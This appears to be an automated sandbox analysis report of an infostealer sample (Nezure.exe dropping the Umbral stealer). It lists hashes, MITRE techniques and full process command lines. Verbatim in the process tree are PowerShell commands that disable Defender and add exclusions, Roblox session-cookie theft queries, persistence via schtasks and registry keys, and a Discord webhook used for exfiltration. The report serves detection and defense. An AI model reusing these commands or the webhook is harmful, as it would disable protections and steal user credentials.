Analysis
-
max time kernel
52s -
max time network
45s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-05-2024 21:52
Static task
static1
Behavioral task
behavioral1
Sample
Nezure.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
Nezure.exe
Resource
win11-20240419-en
General
-
Target
Nezure.exe
-
Size
8.3MB
-
MD5
4efce9b6099fa6bfc272b5e192fe16cc
-
SHA1
d5495d7d0593a0258bb50325eb0381cec5decd19
-
SHA256
185d297d3a204b586f262ce576bc40127b6ea49561b07c7e40c0a2e779df03e1
-
SHA512
0b81846c316c3790b1d3fd88953d7c9350443d8dd34cbf4311677e5706b59f4e8b0819186f7cb81b980bab88b9aa6802170536d50a989f081b0aacb68f58ca5f
-
SSDEEP
196608:UB4vMWmmF95vrRoypY2xNS+U1kYLLBGJt4qi5Wh4d3J4jtQG0gIe:UevBn5viETxNS+5OBU4hat0gI
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1244715424420069449/GTIFnC19DnPwT_RfLQ395m4ILCbNzqdjl2fE6jLwJomWdfGuqMipwhUem4c7oUOG5y7l
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/memory/1108-34-0x0000023FBA770000-0x0000023FBA7B0000-memory.dmp family_umbral behavioral2/files/0x001b00000002ab55-32.dat family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\Videos\\MicrosoftSecurity.exe" Client.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4424 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Modifies AppInit DLL entries 2 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 2084 Nezur.exe 3284 Client.exe 1108 Umbral.exe -
Loads dropped DLL 14 IoCs
pid Process 4580 Process not Found 1104 Process not Found 4092 Process not Found 832 Process not Found 2388 WmiApSrv.exe 3660 Process not Found 1644 Process not Found 4204 Process not Found 4808 Process not Found 1948 Process not Found 652 Process not Found 3060 Process not Found 4924 Process not Found 1572 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Chrome.exe" Client.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 discord.com 1 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\xdwd.dll Client.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3272 schtasks.exe 2600 schtasks.exe 3092 schtasks.exe 712 schtasks.exe 2400 schtasks.exe 1860 schtasks.exe 4696 schtasks.exe 1796 schtasks.exe 1640 schtasks.exe 1352 schtasks.exe 1968 schtasks.exe 780 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4648 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2068 PING.EXE -
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 1108 Umbral.exe 4424 powershell.exe 4424 powershell.exe 728 powershell.exe 728 powershell.exe 2600 powershell.exe 2600 powershell.exe 4236 powershell.exe 4236 powershell.exe 2504 powershell.exe 2504 powershell.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 2388 WmiApSrv.exe 2388 WmiApSrv.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3284 Client.exe Token: SeDebugPrivilege 1108 Umbral.exe Token: SeIncreaseQuotaPrivilege 2500 wmic.exe Token: SeSecurityPrivilege 2500 wmic.exe Token: SeTakeOwnershipPrivilege 2500 wmic.exe Token: SeLoadDriverPrivilege 2500 wmic.exe Token: SeSystemProfilePrivilege 2500 wmic.exe Token: SeSystemtimePrivilege 2500 wmic.exe Token: SeProfSingleProcessPrivilege 2500 wmic.exe Token: SeIncBasePriorityPrivilege 2500 wmic.exe Token: SeCreatePagefilePrivilege 2500 wmic.exe Token: SeBackupPrivilege 2500 wmic.exe Token: SeRestorePrivilege 2500 wmic.exe Token: SeShutdownPrivilege 2500 wmic.exe Token: SeDebugPrivilege 2500 wmic.exe Token: SeSystemEnvironmentPrivilege 2500 wmic.exe Token: SeRemoteShutdownPrivilege 2500 wmic.exe Token: SeUndockPrivilege 2500 wmic.exe Token: SeManageVolumePrivilege 2500 wmic.exe Token: 33 2500 wmic.exe Token: 34 2500 wmic.exe Token: 35 2500 wmic.exe Token: 36 2500 wmic.exe Token: SeIncreaseQuotaPrivilege 2500 wmic.exe Token: SeSecurityPrivilege 2500 wmic.exe Token: SeTakeOwnershipPrivilege 2500 wmic.exe Token: SeLoadDriverPrivilege 2500 wmic.exe Token: SeSystemProfilePrivilege 2500 wmic.exe Token: SeSystemtimePrivilege 2500 wmic.exe Token: SeProfSingleProcessPrivilege 2500 wmic.exe Token: SeIncBasePriorityPrivilege 2500 wmic.exe Token: SeCreatePagefilePrivilege 2500 wmic.exe Token: SeBackupPrivilege 2500 wmic.exe Token: SeRestorePrivilege 2500 wmic.exe Token: SeShutdownPrivilege 2500 wmic.exe Token: SeDebugPrivilege 2500 wmic.exe Token: SeSystemEnvironmentPrivilege 2500 wmic.exe Token: SeRemoteShutdownPrivilege 2500 wmic.exe Token: SeUndockPrivilege 2500 wmic.exe Token: SeManageVolumePrivilege 2500 wmic.exe Token: 33 2500 wmic.exe Token: 34 2500 wmic.exe Token: 35 2500 wmic.exe Token: 36 2500 wmic.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeDebugPrivilege 728 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeIncreaseQuotaPrivilege 3488 wmic.exe Token: SeSecurityPrivilege 3488 wmic.exe Token: SeTakeOwnershipPrivilege 3488 wmic.exe Token: SeLoadDriverPrivilege 3488 wmic.exe Token: SeSystemProfilePrivilege 3488 wmic.exe Token: SeSystemtimePrivilege 3488 wmic.exe Token: SeProfSingleProcessPrivilege 3488 wmic.exe Token: SeIncBasePriorityPrivilege 3488 wmic.exe Token: SeCreatePagefilePrivilege 3488 wmic.exe Token: SeBackupPrivilege 3488 wmic.exe Token: SeRestorePrivilege 3488 wmic.exe Token: SeShutdownPrivilege 3488 wmic.exe Token: SeDebugPrivilege 3488 wmic.exe Token: SeSystemEnvironmentPrivilege 3488 wmic.exe Token: SeRemoteShutdownPrivilege 3488 wmic.exe Token: SeUndockPrivilege 3488 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3844 wrote to memory of 2084 3844 Nezure.exe 80 PID 3844 wrote to memory of 2084 3844 Nezure.exe 80 PID 3844 wrote to memory of 3284 3844 Nezure.exe 82 PID 3844 wrote to memory of 3284 3844 Nezure.exe 82 PID 3844 wrote to memory of 1108 3844 Nezure.exe 83 PID 3844 wrote to memory of 1108 3844 Nezure.exe 83 PID 1108 wrote to memory of 2500 1108 Umbral.exe 85 PID 1108 wrote to memory of 2500 1108 Umbral.exe 85 PID 1108 wrote to memory of 4628 1108 Umbral.exe 87 PID 1108 wrote to memory of 4628 1108 Umbral.exe 87 PID 1108 wrote to memory of 4424 1108 Umbral.exe 89 PID 1108 wrote to memory of 4424 1108 Umbral.exe 89 PID 1108 wrote to memory of 728 1108 Umbral.exe 91 PID 1108 wrote to memory of 728 1108 Umbral.exe 91 PID 1108 wrote to memory of 2600 1108 Umbral.exe 93 PID 1108 wrote to memory of 2600 1108 Umbral.exe 93 PID 1108 wrote to memory of 4236 1108 Umbral.exe 95 PID 1108 wrote to memory of 4236 1108 Umbral.exe 95 PID 1108 wrote to memory of 3488 1108 Umbral.exe 97 PID 1108 wrote to memory of 3488 1108 Umbral.exe 97 PID 1108 wrote to memory of 1664 1108 Umbral.exe 99 PID 1108 wrote to memory of 1664 1108 Umbral.exe 99 PID 1108 wrote to memory of 3956 1108 Umbral.exe 101 PID 1108 wrote to memory of 3956 1108 Umbral.exe 101 PID 1108 wrote to memory of 2504 1108 Umbral.exe 103 PID 1108 wrote to memory of 2504 1108 Umbral.exe 103 PID 1108 wrote to memory of 4648 1108 Umbral.exe 105 PID 1108 wrote to memory of 4648 1108 Umbral.exe 105 PID 1108 wrote to memory of 4636 1108 Umbral.exe 107 PID 1108 wrote to memory of 4636 1108 Umbral.exe 107 PID 4636 wrote to memory of 2068 4636 cmd.exe 109 PID 4636 wrote to memory of 2068 4636 cmd.exe 109 PID 3284 wrote to memory of 240 3284 Client.exe 110 PID 3284 wrote to memory of 240 3284 Client.exe 110 PID 240 wrote to memory of 712 240 CMD.exe 112 PID 240 wrote to memory of 712 240 CMD.exe 112 PID 3284 wrote to memory of 2636 3284 Client.exe 113 PID 3284 wrote to memory of 2636 3284 Client.exe 113 PID 2636 wrote to memory of 2400 2636 CMD.exe 115 PID 2636 wrote to memory of 2400 2636 CMD.exe 115 PID 3284 wrote to memory of 780 3284 Client.exe 116 PID 3284 wrote to memory of 780 3284 Client.exe 116 PID 780 wrote to memory of 1860 780 CMD.exe 118 PID 780 wrote to memory of 1860 780 CMD.exe 118 PID 3284 wrote to memory of 776 3284 Client.exe 121 PID 3284 wrote to memory of 776 3284 Client.exe 121 PID 776 wrote to memory of 4696 776 CMD.exe 123 PID 776 wrote to memory of 4696 776 CMD.exe 123 PID 3284 wrote to memory of 4444 3284 Client.exe 126 PID 3284 wrote to memory of 4444 3284 Client.exe 126 PID 4444 wrote to memory of 1796 4444 CMD.exe 128 PID 4444 wrote to memory of 1796 4444 CMD.exe 128 PID 3284 wrote to memory of 2944 3284 Client.exe 129 PID 3284 wrote to memory of 2944 3284 Client.exe 129 PID 2944 wrote to memory of 3272 2944 CMD.exe 131 PID 2944 wrote to memory of 3272 2944 CMD.exe 131 PID 3284 wrote to memory of 3416 3284 Client.exe 132 PID 3284 wrote to memory of 3416 3284 Client.exe 132 PID 3416 wrote to memory of 2600 3416 CMD.exe 134 PID 3416 wrote to memory of 2600 3416 CMD.exe 134 PID 3284 wrote to memory of 2336 3284 Client.exe 135 PID 3284 wrote to memory of 2336 3284 Client.exe 135 PID 2336 wrote to memory of 3092 2336 CMD.exe 137 PID 2336 wrote to memory of 3092 2336 CMD.exe 137 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4628 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nezure.exe"C:\Users\Admin\AppData\Local\Temp\Nezure.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Users\Admin\AppData\Local\Temp\Nezur.exe"C:\Users\Admin\AppData\Local\Temp\Nezur.exe"2⤵
- Executes dropped EXE
PID:2084
-
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe"4⤵
- Creates scheduled task(s)
PID:712
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:2400
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1860
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:4696
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1796
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:3272
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:2600
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:3092
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵PID:3012
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1640
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵PID:1680
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1968
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵PID:1284
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:780
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵PID:1764
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:4628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1664
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2504
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:4648
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:2068
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2388
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
1KB
MD5b2f8b5bf54e10ae4d93a2eac002cb497
SHA1eccc3cd33596075bf413e4249c1f2491b1b2a6c7
SHA25644e6afcd4b56b7cbc81c4ce55e62b7ae6f8d44948f2b9cc9a6ee9a9adfdce02d
SHA51258c5911a9b98b94909e627f498f839a55383aa213afd9a837ed1f8543198a79a856baa02373f948bfbb0cfd149e7962e2356cdad6695dc6411840faa09700686
-
Filesize
944B
MD505b3cd21c1ec02f04caba773186ee8d0
SHA139e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb
-
Filesize
948B
MD587ebe221d639e66210ef10c93e5f83c3
SHA1483a666b82f7b59e2d569f6f331fa3989fe0f526
SHA2569a41c90023823aa68dc48f5d8592910dc2ad1116bf54870a0832aba787990380
SHA5122a1e22894388a79526f39db4fa7c65db92626719337f865eaac39d0bb28dc95726fba62c1f0d659864843a2804bd803fe3dfbc0840421c80ff735192928efcce
-
Filesize
1KB
MD57332074ae2b01262736b6fbd9e100dac
SHA122f992165065107cc9417fa4117240d84414a13c
SHA256baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA5124ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2
-
Filesize
578KB
MD51984de1def2a649295eb4683cef7b145
SHA1b3772c1d98f1d18bafd8cf4781f65fc17f20811a
SHA256ad1ca0ede87c65ab25cca6d7899da474b27ee5631e55c21120e857d16b9802b2
SHA5128b64bec1f124bfe5df9e3b8f7fcae5921836604c67e537445c48bcc2b7ac0b71d00fc7c8f8609799577bce4cdf24bed38eb0c23bb537881c74216f416a665a65
-
Filesize
7.9MB
MD5754c5ad19cb3bc21a58bccf028bc2b86
SHA166fe0f66d80023b347707248abe6e44e5f9d98ce
SHA2568445e6223a5f1b7f33b0320560b34139ab758006ed4492f581e2b90d3e104f5b
SHA512fdbbfbc10c58e909da664e643bffbe640b4b3242df0da2d5bd40d9691f96ce6cca4c27e166dff7e290b3a5f012b0a3e135e1650bf61a7484253c59cc54177790
-
Filesize
230KB
MD59e9bbff99af7ac67d8bd79f854bd569c
SHA1cce432ed7fc4aa23daf8311e2ef3ea2f056c1ca6
SHA256e0465af4219a63f50e3a44f579d27dc9a0188797faf7f614b5f2ecc1d899a24c
SHA5127b70e1cd5b900aa16894c5cd13925f799d59e11fc3113adeeaf4d770e27b4088546f8e21c674d3aed3c13ccc06c04c22a2d54c8286dda28fee77fd0fd1a870b8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6